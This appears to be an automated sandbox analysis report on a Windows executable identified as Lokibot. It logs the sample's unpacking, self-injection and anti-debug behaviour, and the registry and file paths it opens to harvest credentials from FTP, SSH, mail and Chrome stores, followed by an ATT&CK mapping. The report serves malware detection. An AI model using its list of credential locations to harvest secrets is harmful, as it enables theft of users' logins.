                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404292
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: Binary string: wntdll.pdbUGP source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp

                Data Obfuscation:

                barindex
                Detected unpacking (overwrites its own PE header)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeUnpacked PE file: 1.2.aZOmps0Ug8.exe.400000.0.unpack
                Detected unpacking (changes PE section rights)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeUnpacked PE file: 1.2.aZOmps0Ug8.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 6780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 3980, type: MEMORYSTR
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000A505 push ecx; ret 0_2_1000A518
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile created: C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dllJump to dropped file
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10008836 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_10008836
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exe TID: 776Thread sleep time: -540000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeThread delayed: delay time: 60000Jump to behavior
                Source: aZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000CDB2 IsDebuggerPresent,0_2_1000CDB2
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100093F8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_100093F8
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100098C2 GetProcessHeap,0_2_100098C2
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A402 mov eax, dword ptr fs:[00000030h]0_2_1001A402
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A616 mov eax, dword ptr fs:[00000030h]0_2_1001A616
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A6C7 mov eax, dword ptr fs:[00000030h]0_2_1001A6C7
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A706 mov eax, dword ptr fs:[00000030h]0_2_1001A706
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A744 mov eax, dword ptr fs:[00000030h]0_2_1001A744
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]1_2_0040317B
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10009B60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10009B60

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeMemory written: C:\Users\user\Desktop\aZOmps0Ug8.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe' Jump to behavior
                Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Progman
                Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100098DF cpuid 0_2_100098DF
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10012E10 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_10012E10
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00406069 GetUserNameW,1_2_00406069

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 3980, type: MEMORYSTR
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 6780, type: MEMORYSTR
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: PopPassword1_2_0040D069
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: SmtpPassword1_2_0040D069
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 3980, type: MEMORYSTR
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 6780, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationApplication Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Obfuscated Files or Information2Credentials in Registry2Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Process Injection112Software Packing2Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSystem Information Discovery16Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsSecurity Software Discovery31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
